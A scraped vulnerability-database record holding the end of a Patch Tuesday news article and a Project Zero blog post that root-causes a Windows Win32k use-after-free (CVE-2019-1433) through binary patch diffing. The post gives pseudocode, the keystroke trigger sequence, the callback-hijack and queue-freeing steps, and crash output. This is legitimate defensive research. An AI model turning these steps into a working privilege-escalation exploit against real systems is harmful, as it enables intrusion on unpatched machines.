controls which make RDP a frequent entry point for malware and ransomware.\n\nSpeaking of no-longer-supported Microsoft operating systems, **Windows 7** and **Windows Server 2008** will cease receiving security updates after the next decade's first Patch Tuesday comes to pass on January 14, 2020. While businesses and other volume-license purchasers will [have the option to pay for further fixes](<https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/How-to-get-Extended-Security-Updates-for-eligible-Windows/ba-p/917807>) after that point, all other Windows 7 users who want to stick with Windows will need to consider migrating to **Windows 10** soon.\n\nWindows 10 likes to install patches and sometimes feature updates all in one go and reboot your computer on its own schedule, but you don't have to accept this default setting. _Windows Central_ has [a useful guide](<https://www.windowscentral.com/how-stop-updates-installing-automatically-windows-10>) on how to disable or postpone automatic updates until you're ready to install them. For all other Windows OS users, if you\u2019d rather be alerted to new updates when they\u2019re available so you can choose when to install them, there\u2019s a setting for that in Windows Update. To get there, click the Windows key on your keyboard and type \u201cwindows update\u201d into the box that pops up.\n\nKeep in mind that while staying up-to-date on Windows patches is a good idea, it\u2019s important to make sure you\u2019re updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re probably not losing your mind when the odd buggy patch causes problems booting the system. So do yourself a favor and backup your files before installing any patches.\n\nAnd as always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may even chime in here with some helpful tips.\n\nFinally, once again there are no security updates for **Adobe Flash Player** this month (there is a non-security update available), but Adobe did release critical updates for Windows and macOS versions of its **Acrobat** and **PDF Reader** that fix more than 20 vulnerabilities in these products. **Photoshop** and **ColdFusion 2018** also received security updates today. Links to advisories [here](<https://blogs.adobe.com/psirt/?p=1813>).", "modified": "2019-12-11T01:51:25", "published": "2019-12-11T01:51:25", "id": "KREBS:537C1540357C1E3360A8168D22F44CB5", "href": "https://krebsonsecurity.com/2019/12/patch-tuesday-december-2019-edition/", "type": "krebs", "title": "Patch Tuesday, December 2019 Edition", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:22:44", "bulletinFamily": "info", "cvelist": ["CVE-2016-7255", "CVE-2019-1362", "CVE-2019-13720", "CVE-2019-1433", "CVE-2019-1458", "CVE-2019-1468", "CVE-2019-3568"], "description": "Posted by Maddie Stone, Project Zero\n\n# INTRODUCTION\n\nI\u2019m really interested in 0-days exploited in the wild and what we, the security community, can learn about them to make 0-day hard. I explained some of Project Zero\u2019s ideas and goals around in-the-wild 0-days in a [November blog post](<https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html>). \n\n** \n**\n\nOn December\u2019s Patch Tuesday, I was immediately intrigued by CVE-2019-1458, a Win32k Escalation of Privilege (EoP), said to be exploited in the wild and discovered by Anton Ivanov and Alexey Kulaev of Kaspersky Lab. Later that day, Kaspersky published a [blog post](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>) on the exploit. The blog post included details about the exploit, but only included partial details on the vulnerability. My end goal was to do variant analysis on the vulnerability, but without full and accurate details about the vulnerability, I needed to do a root cause analysis first. I tried to get my hands on the exploit sample, but I wasn't able to source a copy.\n\n** \n**\n\nWithout the exploit, I had to use binary patch diffing in order to complete root cause analysis. Patch diffing is an often overlooked part of the perpetual vulnerability disclosure debate, as vulnerabilities become public knowledge as soon as a software update is released, not when they are announced in release notes. Skilled researchers can quickly determine the vulnerability that was fixed by comparing changes in the codebase between old and new versions. If the vulnerability is not publicly disclosed before or at the same time that the patch is released, then this could mean that the researchers who undertake the patch diffing effort could have more information than the defenders deploying the patches.\n\n** \n**\n\nWhile my patch diffing adventure did not turn out with me analyzing the bug I intended (more on that to come!), I do think my experience can provide us in the community with a data point. It\u2019s rarely possible to reference hard timelines for how quickly sophisticated individuals can do this type of patch-diffing work, so we can use this as a test. I acknowledge that I have significant experience in reverse engineering, however I had no previous experience at all doing research on a Windows platform, and no knowledge of how the operating system worked. It took me three work weeks from setting up my first VM to having a working crash proof-of-concept for a vulnerability. This can be used as a data point (likely a high upper bound) for the amount of time it takes for individuals to understand a vulnerability via patch diffing and to create a working proof-of-concept crasher, since most individuals will have prior experience with Windows.\n\n** \n**\n\nBut as I alluded to above, it turns out I analyzed and wrote a crash POC for not CVE-2019-1458, but actually [CVE-2019-1433](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1433>). I wrote this whole blog post back in January, went through internal reviews, then sent the blog post to Microsoft to preview (we provide vendors with 24 hour previews of blog posts). That\u2019s when I learned I\u2019d analyzed CVE-2019-1433, not CVE-2019-1458. At the beginning of March, Piotr Florczyk published a [detailed root cause analysis and POC for the \u201creal\u201d CVE-2019-1458 bug](<https://github.com/piotrflorczyk/cve-2019-1458_POC>). With the \u201creal\u201d root cause analysis for CVE-2019-1458 now available, I decided that maybe this blog post could still be helpful to share what my process was to analyze Windows for the first time and where I went wrong.\n\n** \n**\n\nThis blog post will share my attempt to complete a root cause analysis of CVE-2019-1458 through binary patch diffing, from the perspective of someone doing research on Windows for the first time. This includes the process I used, a technical description of the \u201cwrong\u201d, but still quite interesting bug I analyzed, and some thoughts on what I learned through this work, such as where I went wrong. This includes the root cause analysis for CVE-2019-1433, that I originally thought was the vulnerability for the in the wild exploit. As far as I know, the vulnerability detailed in this blog post was not exploited in the wild.\n\n# MY PROCESS\n\nWhen the vulnerability was disclosed on December\u2019s Patch Tuesday, I was immediately interested in the vulnerability. As a part of my new role on Project Zero where I\u2019m leading efforts to study 0-days used in the wild, I was really interested in learning Windows. I had never done research on a Windows platform and didn\u2019t know anything about Windows programming or the kernel. This vulnerability seemed like a great opportunity to start since:\n\n 1. Complete details about the specific vulnerability weren't available,\n\n 2. It affected both Windows 7 and Windows 10, and\n\n 3. The vulnerability is in win32k which is a core component of the Windows kernel.\n\n** \n**\n\nI spent a few days trying to get a copy of the exploit, but wasn\u2019t able to. Therefore I decided that binary patch-diffing would be my best option for figuring out the vulnerability. I was very intrigued by this vulnerability because it affected Windows 10 in addition to Windows 7. However, James Forshaw advised me to patch diff the Windows 7 win32k.sys files rather than the Windows 10 versions. He suggested this for a few reasons:\n\n 1. The signal to noise ratio is going to be much higher for Windows 7 rather than Windows 10. This \u201cnoise\u201d includes things like [Control Flow Guard](<https://docs.microsoft.com/en-us/windows/win32/secbp/control-flow-guard>), more inline instrumentation calls, and \u201cweirder\u201d compiler settings. \n\n 2. On Windows 10, win32k is broken up into a few different files: win32k.sys, win32kfull.sys, win32kbase.sys, rather than a single monolithic file.\n\n 3. Kaspersky\u2019s blog post stated that not all Windows 10 builds were affected.\n\n** \n**\n\nI got to work creating a Windows 7 testing environment. I created a Windows 7 SP1 x64 VM and then started the long process of patching it up until September 2019 (the last available update prior to the December 2019 update where the vulnerability was supposedly fixed). This took about a day and a half as I worked to find the right order to apply the different updates.\n\n** \n**\n\nTurns out that me thinking that September 2019 was the last available update prior to December 2019 would be one of the biggest reasons that I patch-diffed the wrong bug. I thought that September 2019 was the latest because it was the only update shown to me, besides December 2019, when I clicked \u201cCheck for Updates\u201d within the VM. Because I was new to Windows, I didn\u2019t realize that not all updates may be listed in the Windows Update window or that updates could also be downloaded from the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Home.aspx>). When Microsoft told me that I had analyzed the wrong vulnerability, that\u2019s when I realized my mistake. CVE-2019-1433, the vulnerability I analyzed, was patched in November 2019, not December 2019. If I had patch-diffed November to December, rather than September to December, I wouldn\u2019t have gotten mixed up.\n\n** \n**\n\nOnce the Windows 7 VM had been updated to Sept 2019, I made a copy of its C:\\Windows\\System32\\win32k.sys file and snapshotted the VM. I then updated it to the most recent patch, December 2019, where the vulnerability in question was fixed. I then snapshotted the VM again and saved off the copy of win32k.sys. These two copies of win32k.sys are the two files I diffed in my patch diffing analysis.\n\n** \n**\n\nWin32k is a core kernel driver that is responsible for the windows that are shown as a part of the GUI. In later versions of Windows, it\u2019s broken up into multiple files rather than the single file that it is on Windows 7. Having only previously worked on the Linux/Android and RTOS kernels, the GUI aspects took a little bit of time to wrap my head around.\n\n** \n**\n\nOn James Foreshaw\u2019s recommendation, I cloned my VM so that one VM would run [WinDbg](<https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg--kernel-mode->) and debug the other VM. This allows for kernel debugging.\n\n** \n**\n\nNow that I had a copy of the supposed patched and supposed vulnerable versions of win32k.sys, it\u2019s time to start patch diffing.\n\n## PATCH DIFFING WINDOWS 7 WIN32K.SYS\n\nI decided to use BinDiff to patch diff the two versions of win32k. In October 2019, I did a comparison on the different binary diffing tools available [[video](<https://thecyberwire.com/stories/Maddie-Stone-Whatsup-with-WhatsApp-A-Detailed-Walk-Through-of-Reverse-Engineering-CVE-2019-3568.html>), [slides](<https://github.com/maddiestone/ConPresentations/raw/master/Jailbreak2019.WhatsUpWithWhatsApp.pdf>)], and for me, BinDiff worked best \u201cout of the box\u201d so I decided to at least start with that again.\n\n** \n**\n\nI loaded both files into IDA and then ran BinDiff between the two versions of win32k. To my pleasant surprise, there were only 23 functions total in the whole file/driver that had changed from one version to another. In addition, there were only two new functions added in the December 2019 file that didn\u2019t exist in September. This felt like a good sign: 23 functions seemed like even in the worst case, I could look at all of them to try and find the patched vulnerability. (Between the November and December 2019 updates only 5 functions had changed, which suggests the diffing process could have been even faster.)\n\n \n\n\n[](<https://1.bp.blogspot.com/-aVhnHuLjSCo/XoYOV0ev26I/AAAAAAAAPbw/atN5FMEnaS0CkZghfKU1LjoNB1ot9LoggCNcBGAsYHQ/s1600/1_Bindiff-noSymbols.png>)\n\n \n\n\nOriginal BinDiff Matched Functions of win32k.sys without Symbols\n\n** \n**\n\nWhen I started the diff, I didn\u2019t realize that the Microsoft Symbol Server was a thing that existed. I learned about the Symbol Server and was told that I could easily get the symbols for a file by running the following command in WinDbg: x win32k!*. I still hadn\u2019t realized that IDA Pro had the capability to automatically get the symbols for you from a PDB file, even if you aren\u2019t running IDA on a Windows computer. So after running the WinDBG command, I copied all of the output to a file, rebased my IDA Pro databases to the same base address and then would manually rename functions as I was reversing based on the symbols and addresses in the text file. About a week into this escapade, I learned how to modify the IDA configuration file to have my IDA Pro instance, running on Linux, connect to my Windows VM to get the symbols.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-GW0vp_mg4m0/Xpto5bZmk8I/AAAAAAAAPhs/9tdNfmFEo7oux9cM1WD1df0BNg_P7hG8gCNcBGAsYHQ/s1600/2_Bindiff-Symbols%2B%25281%2529.png>)\n\n \n\n\nBinDiff Matched Function of win32k.sys with Symbols\n\n** \n**\n\nWhat stood out at first when I looked at BinDiff was that none of the functions called out in Kaspersky\u2019s blog post had been changed: not DrawSwitchWndHilite, CreateBitmap, SetBitmapBits, nor NtUserMessageCall. Since I didn\u2019t have a strong indicator for a starting point, I instead tried to rule out functions that likely wouldn\u2019t be the change that I was looking for. I first searched for function names to determine if they were a part of a different blog post or CVE. Then I looked through all of the CVEs claimed to affect Windows 7 that were fixed in the December Bulletin and matched them up. Through this I ruled out the following functions:\n\n * CreateSurfacePal \\- [CVE-2019-1362](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1362>)\n\n * RFONTOBJ::bInsterGlyphbitsLookaside, xInsertGlyphbitsRFONTOBJ \\- [CVE-2019-1468](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1468>)\n\n** \n**\n\n## EXPLORING THE WRONG CHANGES\n\nAt this point I started scanning through functions to try and understand their purpose and look at the changes that were made. GreGetStringBitmapW caught my eye because it had \u201cbitmap\u201d in the name and Kaspersky\u2019s blog post talked about the use of bitmaps.\n\n** \n**\n\nThe changes to GreGetStringBitmapW didn\u2019t raise any flags: one of the changes had no functional impact and the other was sending arguments to another function, a function that was also listed as having changed in this update. This function had no public symbols available and is labeled as vuln_sub_FFFFF9600028F200 in the Bindiff image above. In the Dec 2019 win32k.sys its offset from base address is 0x22F200.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-SliC7FMJvbA/Xpto5X5btDI/AAAAAAAAPhk/2_35zFpN7AMMbQCMSEzrikeN2bZpmc4ewCNcBGAsYHQ/s1600/3_Bindiff%2Bfor%2Bvuln%2Bfunction%2B%25281%2529.png>)\n\n** \n**\n\nAs shown by the BinDiff flow graph above, there is a new block of code added in the Dec 2019 version of win32k.sys. The Dec 2019 added argument checking before using that argument when calculating where to write to a buffer. This made me think that this was a vulnerability in contention: it\u2019s called from a function with bitmap in the name and appears that there would be a way to overrun a buffer.\n\n** \n**\n\nI decided to keep reversing and spent a few days on this change. I was getting deep down in the rabbit hole though and had to remember that the only tie I had between this function and the details known about the in-the-wild exploit was that \u201cbitmap\u201d was in the name. I needed to determine if this function was even called during the calls mentioned in the Kaspersky blog post. I followed cross-references to determine how this function could be called.\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-mB6GU5FDVxc/Xpto5V4kkFI/AAAAAAAAPho/W7W9o3LFX2oM2PTjgcsPXBeAEJ05JY17wCNcBGAsYHQ/s1600/4_Call%2Bgraph%2Bto%2Bvuln_sub%2B%25281%2529.png>)\n\n \n\n\n** \n**\n\nThe Nt prefix on function names means that the function is a syscall. The Gdi in NtGdiGetStringBitmapW means that the user-mode call is in gdi32.dll. Mateusz Jurczyk provides a table of Windows syscalls [here](<https://j00ru.vexillium.org/syscalls/win32k/64/>). Therefore, the only way to trigger this function is through a syscall to NtGdiGetStringBitmapW. In gdi32.dll, the only call to NtGdiGetStringBitmapW is GetStringBitmapA, which is exported.\n\n** \n**\n\nTracing this call path and realizing that none of the functions mentioned in the Kaspersky blog post called this function made me realize that it was pretty unlikely that this was the vulnerability. However, I decided to dynamically double check that this function wouldn\u2019t be called when calling the functions listed in the blog post or trigger the task switch window.\n\n** \n**\n\nI downloaded Visual Studio into my Windows 7 VM and wrote my first Windows Desktop app, following [this guide](<https://docs.microsoft.com/en-us/cpp/windows/walkthrough-creating-windows-desktop-applications-cpp?view=vs-2019>). Once I had a working \u201cHello, World\u201d, I began to add calls to the functions that are mentioned in the Kaspersky blog post: Creating the \u201cSwitch\u201d window, CreateBitmap, SetBitmapBits, NtUserMessageCall, and half-manually/half-programmatically trigger the task-switch window, etc. I set a kernel breakpoint in Windbg on the function of interest and then ran all of these. The function was never triggered, confirming that it was very unlikely this was the vulnerability of interest.\n\n** \n**\n\nI then moved on to GreAnimatePalette. When you trigger the task switch window, it draws a new window onto the screen and moves the \u201chighlight\u201d to the different windows each time you press tab. I thought that, \u201cSure, that could involve animating a palette\u201d, but I learned from last time and started with trying to trigger the call in WinDbg instead. I found that it was never called in the methods that I was looking at so I didn\u2019t spend too long and moved on.\n\n** \n**\n\n## NARROWING IT DOWN TO xxxNextWindow and xxxKeyEvent\n\nAfter these couple of false starts, I decided to change my process. Instead of starting with the functions in the diff, I decided to start at the function named in Kaspersky\u2019s blog: DrawSwitchWndHilite. I searched the cross-references graph to DrawSwitchWndHilite for any functions listed in the diff as having been changed.\n\n[](<https://1.bp.blogspot.com/-feXJTEAgl44/Xpto6OfKniI/AAAAAAAAPhw/jYsbKf5Cbf4f2pMxfw4p84PjMYyoaVmrACNcBGAsYHQ/s1600/5_Cross-refs%2Bto%2BDrawSwitchWndHilite%2B%25281%2529.png>)\n\n** \n**\n\nAs shown in the call graph above, xxxNextWindow is two calls above DrawSwitchWndHilite. When I looked at xxxNextWindow, I then saw that xxxNextWindow is only called by xxxKeyEvent and all of the changes in xxxKeyEvent surrounded the call to xxxNextWindow. These appeared to be the only functions in the diff that lead to a call to DrawSwitchWndHilite so I started reversing to understand the changes.\n\n** \n**\n\n## REVERSING THE VULNERABILITY\n\nI had gotten symbols for the function names in my IDA databases, but for the vast majority of functions, this didn\u2019t include type information. To begin finding type information, I started googling for different function names or variable names. While it didn\u2019t have everything, ReactOS was one of the best resources for finding type information, and most of the structures were already in IDA.\n\n** \n**\n\nFor example, when looking at xxxKeyEvent, I saw that in one case, the first argument to xxxNextWindow is gpqForeground. When I googled for gpqForeground, ReactOS showed me that this variable has type tagQ *. Through this, I also realized that Windows uses a convention for naming variables where the type is abbreviated at the beginning of the name. For example: gpqForeground \u2192 global, pointer to queue (tagQ *), gptiCurrent \u2192 global, pointer to thread info (tagTHREADINFO *).\n\n** \n**\n\nThis was important for the modification to xxxNextWindow. There was a single line change between September and December to xxxNextWindow. The change checked a single bit in the structure pointed to by arg1. If that bit is set, the function will exit in the December version. If it\u2019s not set, then the function proceeds, using arg1. Once I knew that the type of the first argument was tagQ *, I used WinDbg and/or IDA to see its structure. The command in WinDbg is dt win32k!tagQ.\n\n** \n**\n\nAt this point, I was pretty sure I had found the vulnerability (\ud83d\ude09), but I needed to prove it. This involved about a week more of reversing, reading, debugging, wanting to throw my computer out the window, and getting intrigued by potential vulnerabilities that were not this vulnerability. As a side note, for the reversing, I found that the HexRays decompiler was great for general triage and understanding large blocks of code, but for the detailed understanding necessary (at least for me) for writing a proof-of-concept (POC), I mainly used the disassembly view.\n\n## RESOURCES\n\nHere are some of the resources that were critical for me:\n\n * \u201cKernel Attacks Through User- Mode Callbacks\u201d Blackhat USA 2011 talk by Tarjei Mandt [[slides](<http://mista.nu/research/mandt-win32k-slides.pdf>), video]\n\n * I learned about thread locking, assignment locking, and user-mode callbacks.\n\n * \u201cOne Bit To Rule A System: Analyzing CVE-2016-7255 Exploit In The Wild\u201d by Jack Tang, Trend Micro Security Intelligence [[blog](<https://blog.trendmicro.com/trendlabs-security-intelligence/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild/>)]\n\n * This was an analysis of a vulnerability also related to xxxNextWindow. This blog helped me ultimately figure out how to trigger xxxNextWindow and some argument types of other functions.\n\n * \u201cKernel exploitation \u2013 r0 to r3 transitions via KeUserModeCallback\u201d by Mateusz Jurczyk [[blog](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>)]\n\n * This blog helped me figure out how to modify the dispatch table pointer with my own function so that I could execute during the user-mode callback.\n\n * \u201cWindows Kernel Reference Count Vulnerabilities - Case Study\u201d by Mateusz Jurczyk, Zero Nights 2012 [[slides](<https://j00ru.vexillium.org/slides/2012/zeronights.pdf>)]\n\n * \u201cAnalyzing local privilege escalations in win32k\u201d by mxatone, Uninformed v10 (10/2008) [[article](<http://uninformed.org/?v=10&a=2>)]\n\n * P0 Team Members: James Forshaw, Tavis Ormandy, Mateusz Jurczyk, and Ben Hawkes\n\n# TIMELINE\n\n * Oct 31 2019: Chrome releases fix for CVE-2019-13720\n\n * Dec 10 2019: Microsoft Security Bulletin lists CVE-2019-1458 as exploited in the wild and fixed in the December updates. \n\n * Dec 10-16 2019: I ask around for a copy of the exploit. No luck!\n\n * Dec 16 2019: I begin setting up a Windows 7 kernel debugging environment. (And 2 days work on a different project.)\n\n * Dec 23 2019: VM is set-up. Start patch diffing\n\n * Dec 24-Jan 2: Holiday\n\n * Jan 2 - Jan 3: Look at other diffs that weren\u2019t the vulnerability. Try to trigger DrawSwitchWndHilite\n\n * Jan 6: Realize changes to xxxKeyEvent and xxxNextWindow is the correct change. (Note dear reader, this is not in fact the \u201ccorrect change\u201d.)\n\n * Jan 6-Jan16: Figure out how the vulnerability works, go down random rabbit holes, work on POC.\n\n * Jan 16: Crash POC crashes!\n\n** \n**\n\nApproximately 3 work weeks to set up a test environment, diff patches, and create crash POC. \n\n# CVE-2019-1458 CVE-2019-1433 ROOT CAUSE ANALYSIS\n\nBug class: use-after-free\n\n** \n**\n\n## OVERVIEW\n\nThe vulnerability is a use-after-free of a tagQ object in xxxNextWindow, freed during a user mode callback. (The xxx prefix on xxxNextWindow means that there is a callback to user-mode.) The function xxxKeyEvent is the only function that calls xxxNextWindow and it calls xxxNextWindow with a pointer to a tagQ object as the first argument. Neither xxxKeyEvent nor xxxNextWindow lock the object to prevent it from being freed during any of the user-mode callbacks in xxxNextWindow. After one of these user-mode callbacks (xxxMoveSwitchWndHilite), xxxNextWindow then uses the pointer to the tagQ object without any verification, causing a use-after free.\n\n## DETAILED WALK THROUGH\n\nThis section will walk through the vulnerability on Windows 7. I analyzed the Windows 7 patches instead of Windows 10 as explained above in the process section. The Windows 7 crash POC that I developed is available [here](<https://drive.google.com/file/d/1V9HHljjRq17hnfqasExnCiGCJLkt0aOX/view>).\n\n### ANALYZED SAMPLES\n\nI did the diff and analysis between the September and December 2019 updates of win32k.sys as explained in the \u201cMy Process\u201d section.\n\n** \n**\n\nVulnerable win32k.sys (Sept 2019): 9dafa6efd8c2cfd09b22b5ba2f620fe87e491a698df51dbb18c1343eaac73bcf (SHA-256)\n\nPatched win32k.sys (December 2019): b22186945a89967b3c9f1000ac16a472a2f902b84154f4c5028a208c9ef6e102 (SHA-256)\n\n** \n**\n\n### OVERVIEW\n\nThis walk through is broken up into the following sections to describe the vulnerability:\n\n * Triggering xxxNextWindow\n\n * Freeing the tagQ (queue) structure\n\n * User-mode callback xxxMoveSwitchWndHilite\n\n * Using the freed queue\n\n### TRIGGERING xxxNextWindow\n\nThe code path is triggered by a special set of keyboard inputs to open a \u201cSticky Task Switcher\u201d window. As a side note, I didn\u2019t find a way to manually trigger the code path, only programmatically (not that an individual writing an EoP would need it to be triggered manually). To trigger xxxNextWindow, my proof-of-concept (POC) sends the following keystrokes using the SendInput API: \n\n\n&lt;ALT (Extended)&gt; \\+ TAB + TAB release + ALT + CTRL + TAB + release all except ALT extended + TAB. (See triggerNextWindow function in POC). \n\n** \n**\n\nThe \u201cnormal\u201d way to trigger the task switch window is with ALT + TAB, or ALT+CTRL+TAB for \u201csticky\u201d. However, this window won\u2019t hit the vulnerable code path, xxxNextWindow. The \u201cnormal\u201d task switching window, shown below, looks different from the task switching window displayed when the vulnerable code path is being executed. Shown below is the \u201cnormal\u201d task switch window that is displayed when ALT+TAB [+CTRL] are pressed and xxxNextWindow is NOT triggered. The window that is shown when xxxNextWindow is triggered is shown below that. \n \n \n\n\n[](<https://1.bp.blogspot.com/-o4XFRI3CfJE/Xpto6UevWII/AAAAAAAAPh0/HCRz20rFYRgjy6QGC9m1uvKdadZU-uh5ACNcBGAsYHQ/s1600/6_NormalTaskSwitcher%2B%25281%2529.png>)\n\n \n\n\n \n \n\n\n\"Normal\" task switch window\n\n** \n**\n\n[](<https://1.bp.blogspot.com/-RJX4C9GRLdU/Xpto6mHp-YI/AAAAAAAAPh4/yWKpyz52hY0VX6rL7NgS8gvZR2H9mr1vgCNcBGAsYHQ/s1600/7_NextWindowTaskSwitcher%2B%25281%2529.png>)\n\n \n\n\n \n\n\nWindow that is displayed when xxxNextWindow is called\n\n \nIf this is the first \u201ctab press\u201d then the task switch window needs to be drawn on the screen. This code path through xxxNextWindow is not the vulnerable one. The next time you hit TAB, after the window has already been drawn on the screen, when the rectangle should move to the next window, is when the vulnerable code in xxxNextWindow can be reached. \n\n** \n**\n\n### FREEING THE QUEUE in xxxNextWindow\n\nxxxNextWindow takes a pointer to a queue (tagQ struct) as its first argument. This tagQ structure is the object that we will use after it is freed. We will free the queue in a user-mode callback from the function. \n\n** \n**\n\nAt LABEL_106 below (xxxNextWindow+0x847), the queue is used without verifying whether or not it still exists. The only way to reach LABEL_106 in xxxNextWindow is from the branch at xxxNextWindow+0x842. This means that our only option for a user-callback mode is in the function xxxMoveSwitchWndHilite. xxxMoveSwitchWndHilite is responsible for moving the little box within the task switch window that highlights the next window. \n\n** \n**\n\nvoid __fastcall xxxNextWindow(tagQ *queue, int a2) {\n\n[...]\n\n \n\n\nV43 = 0;\n\nwhile ( 1 ) {\n\nif (gspwndAltTab-&gt;fnid &amp; 0x3FFF == 0x2A0 &amp;&amp;\n\ngspwndAltTab-&gt;cbwndExtra + 0x128 == gpsi-&gt;mpFnid_serverCBWndProc[6] &amp;&amp;\n\ngspwndAltTab-&gt;bDestroyed == 0 )\n\nv45 = *(switchWndStruct **)(gspwndAltTab + 0x128);\n\nelse\n\nv45 = 0i64;\n\nif ( !v45 ) {\n\nThreadUnlock1();\n\ngoto LABEL_106;\n\n}\n\nhandleOfNextWindowToHilite = xxxMoveSwitchWndHilite(v8, v45, isShiftPressed2); \u2190 USER MODE CALLBACK\n\nif ( v43 )\n\n{\n\nif ( v43 == handleOfNextWindowToHilite ) {\n\nv48 = 0i64;\n\nLABEL_103:\n\nThreadUnlock1();\n\nHMAssignmentLock(&amp;gspwndActivate, v48);\n\nif ( !*(_QWORD *)&amp;gspwndActivate )\n\nxxxCancelCoolSwitch();\n\nreturn;\n\n}\n\n} else { v43 = handleOfNextWindowToHilite; }\n\ntagWndPtrOfNextWindow = HMValidateHandleNoSecure(handleOfNextWindowToHilite, TYPE_WINDOW);\n\nif ( tagWndPtrOfNextWindow )\n\ngoto LABEL_103;\n\nisShiftPressed2 = isShiftPressed;\n\n}\n\n \n\n\n[...]\n\n \n\n\nLABEL_106:\n\nv11 = queue-&gt;spwndActive; \u2190 USE AFTER FREE\n\nif ( v11 || (v11 = queue-&gt;ptiKeyboard-&gt;rpdesk-&gt;pDeskInfo-&gt;spwnd-&gt;spwndChild) != 0i64 ) {\n\n \n\n\n[...] \n \n--- \n \n** \n**\n\n#### USER-MODE CALLBACK in xxxMoveSwitchWndHilite\n\nThere are quite a few different user-mode callbacks within xxxMoveSwitchWndHilite. Many of these could work, but the difficulty is picking one that will reliably return to our POC code. I chose the call to xxxSendMessageTimeout in DrawSwitchWndHilite.\n\n** \n**\n\nThis call is sending the message to the window that is being highlighted in the task switch window by xxxMoveSwitchWndHilite. Therefore, if we create windows in our POC, we can ensure that our POC will receive this callback.\n\n** \n**\n\nxxxMoveSwitchWndHilite sends message 0x8C which is WM_LPKDRAWSWITCHWND. This is an undocumented message and thus it\u2019s not expected that user applications will respond to this message. Instead, there is a user-mode function that is automatically dispatched by ntdll!KiUserCallbackDispatcher. The user-mode callback for this message is user32!_fnINLPKDRAWSWITCHWND. In order to execute code during this callback, in the POC we hot-patch the PEB.KernelCallbackTable, using the methodology documented [here](<https://j00ru.vexillium.org/2010/09/kernel-exploitation-r0-to-r3-transitions-via-keusermodecallback/>). \n\n** \n**\n\nIn the callback, we free the tagQ structure using [AttachThreadInput](<https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-attachthreadinput>). AttachThreadInput \u201cattaches the input processing mechanism of one thread to that of another thread\u201d and to do this, it destroys the queue of the thread that is being attached to another thread\u2019s input. The two threads then share a single queue. In the callback, we also have to perform the following operations to force execution down the code path that will use the now freed queue:\n\n 1. xxxMoveSwitchWndHilite returns the handle of the next window it should highlight. When this handle is passed to HMValidateHandleNoSecure, it needs to return 0. Therefore, in the callback we need to destroy the window that is going to be highlighted. When HMValidateHandleNoSecure returns 0, we\u2019ll loop back to the top of the while loop.\n\n 2. Once we\u2019re back at the top of the while loop, in the following code block we need to set v45 to 0. There appear to be two options: fail the check such that you go in the else block or set the extra data in the tagWND struct to 0 using SetWindowLongPtr. The SetWindowLongPtr method doesn\u2019t work because this window is a special system class (fnid == 0x2A0). Therefore, we must fail one of the checks and end up in the else block in order to be in the code path that will allow us to use the freed queue.\n\n** \n**\n\nif (gspwndAltTab-&gt;fnid &amp; 0x3FFF == 0x2A0 &amp;&amp;\n\ngspwndAltTab-&gt;cbwndExtra + 0x128 == gpsi-&gt;mpFnid_serverCBWndProc[6] &amp;&amp;\n\ngspwndAltTab-&gt;bDestroyed == 0 )\n\nv45 = *(switchWndStruct **)(gspwndAltTab + 0x128);\n\nelse\n\nv45 = 0i64; \n \n--- \n \n** \n**\n\n### USING THE FREED QUEUE\n\nOnce v45 is set to 0, the thread is unlocked and execution proceeds to LABEL_106 (xxxNextWindow + 0x847) where mov r14, [rbp+50h] is executed. rbp is the tagQ pointer so we dereference it and move it into r14. Therefore we now have a use-after-free.\n\n** \n**\n\n## WINDOWS 10 \n\nCVE-2019-1433 also affected Windows 10 builds. I did not analyze any Windows 10 builds besides 1903.\n\n** \n**\n\nVulnerable (Oct 2019) win32kfull.sys: c2e7f733e69271019c9e6e02fdb2741c7be79636b92032cc452985cd369c5a2c (SHA-256)\n\nPatched (Nov 2019) win32kfull.sys: 15c64411d506707d749aa870a8b845d9f833c5331dfad304da8828a827152a92 (SHA-256)\n\n** \n**\n\nI confirmed that the vulnerability existed on Windows 10 1903 as of the Oct 2019 patch by triggering the use-after-free with Driver Verifier enabled on win32kfull.sys. Below are excerpts from the crash.\n\n** \n**\n\n*******************************************************************************\n\n* *\n\n* Bugcheck Analysis *\n\n* *\n\n*******************************************************************************\n\n \n\n\nPAGE_FAULT_IN_NONPAGED_AREA (50)\n\nInvalid system memory was referenced. This cannot be protected by try-except.\n\nTypically the address is just plain bad or it is pointing at freed memory.\n\n \n\n\nFAULTING_IP:\n\nwin32kfull!xxxNextWindow+743\n\nffff89ba`965f553b 4d8bbd80000000 mov r15,qword ptr [r13+80h]\n\n \n\n\n# Child-SP RetAddr Call Site\n\n00 ffffa003`81fe5f28 fffff806`800aa422 nt!DbgBreakPointWithStatus\n\n01 ffffa003`81fe5f30 fffff806`800a9b12 nt!KiBugCheckDebugBreak+0x12\n\n02 ffffa003`81fe5f90 fffff806`7ffc2327 nt!KeBugCheck2+0x952\n\n03 ffffa003`81fe6690 fffff806`7ffe4663 nt!KeBugCheckEx+0x107\n\n04 ffffa003`81fe66d0 fffff806`7fe73edf nt!MiSystemFault+0x1d6933\n\n05 ffffa003`81fe67d0 fffff806`7ffd0320 nt!MmAccessFault+0x34f\n\n06 ffffa003`81fe6970 ffff89ba`965f553b nt!KiPageFault+0x360 \n\n07 ffffa003`81fe6b00 ffff89ba`965aeb35 win32kfull!xxxNextWindow+0x743 \u2190 UAF\n\n08 ffffa003`81fe6d30 ffff89ba`96b9939f 